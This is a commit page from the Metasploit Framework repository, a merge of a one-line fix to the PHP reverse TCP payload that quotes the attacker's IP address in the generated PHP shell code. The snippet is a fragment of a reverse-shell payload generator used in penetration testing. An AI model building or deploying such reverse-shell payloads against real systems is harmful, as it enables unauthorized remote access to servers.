Merge branch 'php_reverse_tcp_fix' of https://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-php_reverse_tcp_fix

unstable
sinn3r 2012-06-25 14:19:17 -05:00
commit 361ca2b4ae
1 changed files with 1 additions and 1 deletions

View File

@ -69,7 +69,7 @@ module Metasploit3
end
shell=<<-END_OF_PHP_CODE
$ipaddr=#{ipaddr};
$ipaddr='#{ipaddr}';
$port=#{port};
#{php_preamble({:disabled_varname => "$dis"})}